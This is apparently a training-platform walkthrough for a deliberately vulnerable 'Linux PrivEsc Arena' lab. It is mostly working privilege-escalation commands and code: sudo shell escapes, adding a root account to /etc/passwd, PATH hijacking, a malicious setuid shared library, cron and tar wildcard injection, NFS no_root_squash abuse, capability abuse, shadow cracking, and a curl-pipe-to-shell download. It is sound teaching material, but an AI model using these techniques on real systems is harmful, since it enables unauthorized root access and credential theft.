Linux PrivEsc Arena

intermediate2hWriteup

Multiple privilege escalation challenges

Learning Objectives

  • Complete all challenges
  • Use multiple techniques
  • Practice enumeration
  • Chain vulnerabilities

Linux PrivEsc Arena is a practice environment with multiple privilege escalation vectors to exploit. This walkthrough covers each technique on the box, helping you build muscle memory for real-world engagements.

This room is designed for practice. Each technique is intentionally vulnerable - in real engagements, you might only find one or two vectors. Practice them all here so you recognize them in the wild!

Getting Started

bash
1606070;"># SSH into the machine
2ssh TCM@TARGET_IP
3606070;"># Password: Hacker123
4 
5606070;"># Basic enumeration
6id
7uname -a
8cat /etc/issue
9 
10606070;"># Run linpeas for comprehensive scan
11curl -L https:606070;">//github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Kernel Exploits

bash
1606070;"># Check kernel version
2uname -r
3606070;"># Example: 3.13.0-24-generic
4 
5606070;"># Search for exploits
6searchsploit linux kernel 3.13
7606070;"># or use linux-exploit-suggester
8 
9606070;"># Download and compile exploit on target or attacker
10gcc exploit.c -o exploit
11chmod +x exploit
12./exploit
13 
14606070;"># If successful: root shell
Kernel exploits can crash systems. In CTFs they're fine, but in real engagements, get explicit permission and have a recovery plan.

Stored Passwords

bash
1606070;"># Check history files
2cat ~/.bash_history
3606070;"># Might contain: mysql -u root -p'password123'
4 
5606070;"># Check config files
6cat /var/www/html/config.php
7cat /var/www/html/wp-config.php
8 
9606070;"># Check for backup files
10find / -name 606070;">#a5d6ff;">"*.bak" 2>/dev/null
11find / -name 606070;">#a5d6ff;">"*.old" 2>/dev/null
12 
13606070;"># Check for readable shadow file
14cat /etc/shadow
15606070;"># If readable, crack with john:
16unshadow /etc/passwd /etc/shadow > hashes.txt
17john hashes.txt --wordlist=rockyou.txt

Weak File Permissions

bash
1606070;"># Writable /etc/passwd
2ls -la /etc/passwd
3606070;"># If writable, add new root user:
4 
5606070;"># Generate password hash
6openssl passwd -1 newpassword
7606070;"># Output: $1$xyz$hashhere
8 
9606070;"># Add to /etc/passwd
10echo 606070;">#a5d6ff;">'newroot:$1$xyz$hashhere:0:0:root:/root:/bin/bash' >> /etc/passwd
11 
12606070;"># Login as new root
13su newroot
14 
15606070;"># Writable /etc/shadow
16ls -la /etc/shadow
17606070;"># If writable, replace root hash:
18606070;"># Generate: openssl passwd -6 newpassword
19606070;"># Replace root's hash in /etc/shadow

SSH Keys

Check for writable ~/.ssh/authorized_keys. You can add your public key for persistent access!

Sudo Exploitation

bash
1606070;"># Check sudo permissions
2sudo -l
3 
4606070;"># === Example 1: vim ===
5606070;"># (root) NOPASSWD: /usr/bin/vim
6sudo vim -c 606070;">#a5d6ff;">':!/bin/bash'
7 
8606070;"># === Example 2: awk ===
9606070;"># (root) NOPASSWD: /usr/bin/awk
10sudo awk 606070;">#a5d6ff;">'BEGIN {system("/bin/bash")}'
11 
12606070;"># === Example 3: nmap (old versions) ===
13606070;"># (root) NOPASSWD: /usr/bin/nmap
14sudo nmap --interactive
15!sh
16 
17606070;"># === Example 4: find ===
18606070;"># (root) NOPASSWD: /usr/bin/find
19sudo find /etc -exec /bin/bash ; -quit
20 
21606070;"># === Example 5: env ===
22606070;"># (root) NOPASSWD: /usr/bin/env
23sudo env /bin/bash
24 
25606070;"># === Example 6: ftp ===
26606070;"># (root) NOPASSWD: /usr/bin/ftp
27sudo ftp
28!/bin/bash
29 
30606070;"># === Example 7: less/more ===
31606070;"># (root) NOPASSWD: /usr/bin/less
32sudo less /etc/passwd
33!/bin/bash

SUID Exploitation

bash
1606070;"># Find SUID binaries
2find / -perm -u=s -type f 2>/dev/null
3 
4606070;"># === Custom SUID binary (vulnerable.elf) ===
5606070;"># Check what it does
6strings /usr/local/bin/vulnerable.elf
7ltrace /usr/local/bin/vulnerable.elf
8606070;"># If it calls system("service apache2 start")
9606070;"># without full path, exploit via PATH manipulation:
10 
11cd /tmp
12echo 606070;">#a5d6ff;">'/bin/bash' > service
13chmod +x service
14export PATH=/tmp:$PATH
15/usr/local/bin/vulnerable.elf
16606070;"># Root shell!
17 
18606070;"># === Shared library injection ===
19606070;"># If SUID binary loads library from writable location:
20strace /usr/local/bin/suid-binary 2>&1 | grep open
21606070;"># Look for: open("/home/user/lib.so", O_RDONLY) = -1
22 
23606070;"># Create malicious library
24cat > /tmp/lib.c << 606070;">#a5d6ff;">'EOF'
25606070;">#include <stdio.h>
26606070;">#include <stdlib.h>
27static void inject() __attribute__((constructor));
28void inject() {
29    setuid(0);
30    system(606070;">#a5d6ff;">"/bin/bash -p");
31}
32EOF
33gcc -shared -fPIC -o /home/user/lib.so /tmp/lib.c
34/usr/local/bin/suid-binary

Cron Job Exploitation

bash
1606070;"># View cron jobs
2cat /etc/crontab
3606070;"># Example: * * * * * root /usr/local/bin/cron.sh
4 
5606070;"># Check permissions
6ls -la /usr/local/bin/cron.sh
7606070;"># If writable:
8echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/cron.sh
9606070;"># Wait for cron to run
10/tmp/bash -p
11 
12606070;"># === Wildcard exploitation ===
13606070;"># If cron: cd /home/user && tar czf /tmp/backup.tar.gz *
14 
15cd /home/user
16echo 606070;">#a5d6ff;">'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > shell.sh
17touch -- --checkpoint=1
18touch -- 606070;">#a5d6ff;">'--checkpoint-action=exec=sh shell.sh'
19606070;"># Wait for cron
20/tmp/bash -p

NFS Root Squashing

bash
1606070;"># Check NFS exports
2cat /etc/exports
3606070;"># Example: /home/user *(rw,no_root_squash)
4 
5606070;"># On attacker machine:
6showmount -e TARGET_IP
7mkdir /tmp/nfs
8mount -o rw,vers=2 TARGET_IP:/home/user /tmp/nfs
9 
10606070;"># Create SUID binary
11cat > /tmp/nfs/suid.c << 606070;">#a5d6ff;">'EOF'
12int main() {
13    setuid(0);
14    setgid(0);
15    system(606070;">#a5d6ff;">"/bin/bash");
16}
17EOF
18gcc /tmp/nfs/suid.c -o /tmp/nfs/suid
19chmod +s /tmp/nfs/suid
20 
21606070;"># On target:
22/home/user/suid
23606070;"># Root shell!

Capabilities

bash
1606070;"># Find binaries with capabilities
2getcap -r / 2>/dev/null
3 
4606070;"># Example: /usr/bin/python2.7 = cap_setuid+ep
5/usr/bin/python2.7 -c 606070;">#a5d6ff;">'import os; os.setuid(0); os.system("/bin/bash")'
6 
7606070;"># Example: /usr/bin/tar = cap_dac_read_search+ep
8606070;"># Can read any file!
9tar -cvf shadow.tar /etc/shadow
10tar -xvf shadow.tar
11cat etc/shadow

PrivEsc Methodology

Systematic Approach

1
Automated EnumerationRun LinPEAS/linEnum for comprehensive scan
2
Check sudo -lOften the quickest win
3
Find SUID BinariesCheck against GTFOBins
4
Check Cron JobsLook for writable scripts or wildcard issues
5
Search for PasswordsHistory, configs, backups
6
Check Capabilitiesgetcap -r /
7
Check NFScat /etc/exports for no_root_squash
8
Kernel ExploitsLast resort - check version against exploit-db

Knowledge Check

Quick Quiz
Question 1 of 2

In tar wildcard exploitation, what does --checkpoint-action do?

Key Takeaways

  • Practice multiple techniques to build recognition skills
  • GTFOBins is essential for sudo/SUID exploitation
  • Automated tools find issues; manual verification confirms exploitability
  • Real environments usually have fewer vectors - practice finding the one that works
  • Document your methodology for consistent results
  • Kernel exploits are powerful but risky - use as last resort